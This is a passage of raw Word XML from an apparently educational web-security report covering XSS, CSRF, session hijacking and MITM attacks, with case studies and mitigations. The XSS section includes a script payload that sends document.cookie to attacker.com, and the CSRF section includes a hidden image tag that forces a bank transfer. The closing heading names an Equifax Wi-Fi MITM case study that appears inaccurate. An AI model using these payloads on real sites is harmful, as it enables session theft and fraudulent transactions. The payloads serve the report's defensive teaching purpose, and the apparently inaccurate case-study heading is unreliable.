        </w:rPr>
        <w:t xml:space="preserve"> Implement systems to detect unusual query patterns that might indicate injection attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D20E27" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>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Query Whitelisting:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Only allow pre-approved query structures in applications with limited database interaction needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7591AE"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3. Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2262C429"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3.1 Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420C2DCA"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Cross-Site Scripting vulnerabilities allow attackers to inject client-side scripts into web pages viewed by other users. Unlike SQL Injection, XSS exploits the trust a user's browser has in the website. When successful, XSS can steal cookies, session tokens, redirect users to malicious sites, or manipulate page content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68457081"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 xml:space="preserve">Modern XSS attacks have evolved beyond simple cookie theft to include advanced exploit chains that leverage browser vulnerabilities, perform crypto-mining operations, conduct </w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>network reconnaissance from within the victim's browser, and even establish persistent access through web-based backdoors. The rise of single-page applications and client-side frameworks has introduced new XSS attack vectors that traditional server-side protections cannot address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF9E1B3"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3.2 Attack Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F546BE3"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XSS attacks generally fall into three categories:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BBD7D5" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>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Stored XSS:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Malicious script is permanently stored on target servers and served to users when they request the affected resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0553BD4E" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>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Reflected XSS:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Malicious script is reflected off a web server in responses that include part of the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78921247" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>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DOM-based XSS:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vulnerability exists in client-side code that modifies the DOM environment in the victim's browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D42FCC"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For example, a vulnerable comment system might allow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653A5E47"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&lt;script&gt;document.location='http://attacker.com/steal.php?cookie='+document.cookie&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3FBA57"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When users view the comment, the script executes in their browsers, potentially sending their cookies to the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DC4857"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3.3 Real-World Case Study: Samy Worm on MySpace (2005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCFF5F0"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The Samy Worm infected over one million MySpace profiles within 20 hours. Samy Kamkar identified that MySpace filtered certain HTML tags but allowed some JavaScript to pass through. He crafted obfuscated JavaScript that added "but most of all, Samy is my hero" to victims' profiles and copied itself to visitors of infected profiles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241AEB34"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lastRenderedPageBreak/>
        <w:t>MySpace had to temporarily shut down to address the vulnerability. While relatively benign, the same techniques could have been used for credential theft or malware distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BDFCD6"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3.4 Mitigation Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E997A82" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>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Content Security Policy:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Restrict which scripts can execute in the browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FD7BC2" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>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Output Encoding:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Encode special characters based on context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0781939A" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>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Input Validation:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Validate all user input against whitelists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1108316C" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>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Modern Frameworks:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use frameworks that automatically escape content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025CB1BD" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>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HTTPOnly Cookies:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prevent JavaScript access to sensitive cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391B474C"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4. Cross-Site Request Forgery (CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668B0BD2"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4.1 Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5166A1"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Cross-Site Request Forgery attacks trick authenticated users into unknowingly executing actions on websites where they're logged in. CSRF exploits the trust that a site has in a user's browser, using the victim's authenticated session to perform unintended actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DB2B8A"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4.2 Attack Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2322537B"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CSRF attacks typically involve:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E96362" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>The victim authenticates with a legitimate website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72968E4D" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Authentication creates a session cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DE08CD" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>The victim visits a malicious site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25045872" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>The malicious site sends a request to the legitimate site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C1DB31" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>The browser automatically includes relevant cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5202AF1B" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The legitimate site processes the request as if intentionally submitted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C048383"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For example, a malicious website might contain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64361739"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&lt;img src="https://bank.example/transfer?to=attacker&amp;amount=1000" style="display:none" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A25CF5C"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4.3 Real-World Case Study: 2008 uTorrent CSRF Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6790B43E"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In 2008, a CSRF vulnerability was discovered in uTorrent's web interface. The vulnerability allowed attackers to manipulate settings and download arbitrary torrent files to a victim's computer. The attack worked by tricking users into visiting a malicious website while having the uTorrent web interface open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355F94BA"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The malicious site would make requests to the uTorrent web interface, changing settings or adding new torrents. This was particularly dangerous because it could be used to download malware or change system directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED9741F"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4.4 Mitigation Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674886DA" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>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Anti-CSRF Tokens:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Include unpredictable tokens in forms that are verified server-side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646A3EDF" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>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Same-Site Cookies:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Restrict cross-origin requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFADD82" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>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Custom Request Headers:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use headers that simple cross-origin requests cannot set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65109EAA" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>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Re-authentication:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Require password confirmation for sensitive actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A3C2D0"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5. Session Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A758459"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5.1 Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79631B8D"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lastRenderedPageBreak/>
        <w:t>Session hijacking occurs when an attacker gains unauthorized access to a user's session identifier, allowing them to impersonate the user. Web applications track authenticated users through session tokens or cookies, making these valuable targets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A24EC87"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5.2 Attack Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2592DE12"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Session hijacking techniques include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5E2904" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>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Session Sniffing:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Intercepting network traffic to capture session IDs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D583513" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>
        </w:num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 xml:space="preserve">Man-in-the-Browser Attacks: </w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Using malware to access browser session data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF903B3" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>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Cross-Site Scripting:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Stealing cookies containing session information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0FD627" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>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Session Fixation:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Forcing a user to use a known session ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19974DC4" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>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Predictable Session IDs:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Guessing session IDs if they follow patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8F2980"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5.3 Real-World Case Study: 2018 Facebook Data Breach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B37F068"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In September 2018, Facebook disclosed a major security breach affecting approximately 50 million users. The attack exploited a vulnerability in the "View As" feature, which incorrectly issued access tokens. By obtaining these tokens, attackers could take over accounts and potentially access third-party services using Facebook's Single Sign-On.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0ECEFA"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Facebook's response included resetting access tokens for affected users and temporarily disabling the vulnerable feature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2716C6"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5.4 Mitigation Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A18E7C" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>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HTTPS Implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>: Encrypt all traffic to prevent session ID interception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E3FBBF" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>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Secure and HttpOnly Cookie Flags:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Protect cookies from theft.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063D99EB" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>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Session Timeout:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement reasonable expiration times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04468373" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>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lastRenderedPageBreak/>
        <w:t>Session Regeneration:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Generate new session IDs after authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202D734C" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>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Multi-factor Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>: Require additional verification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AACFE02"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6. Man-in-the-Middle (MITM) Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29994C93"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6.1 Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791B5F91"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Man-in-the-Middle attacks occur when an attacker positions themselves between two communicating parties, intercepting and potentially modifying messages without detection. MITM attacks typically target the connection between a user's browser and web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2E3869"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6.2 Attack Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A36DC00"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MITM techniques include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A2CD42" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>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WiFi Eavesdropping</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>: Setting up rogue access points.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A92DF9" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>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ARP Spoofing:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Redirecting network traffic through the attacker's machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125590DC" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>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DNS Spoofing</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>: Redirecting traffic to malicious servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A314DF" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>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SSL/TLS Interception:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Intercepting encrypted traffic with fake certificates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46649DC1"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6.3 Real-World Case Study: 2017 Equifax Public Wi-Fi MITM Attack</w:t>
      </w:r>
    </w:p>
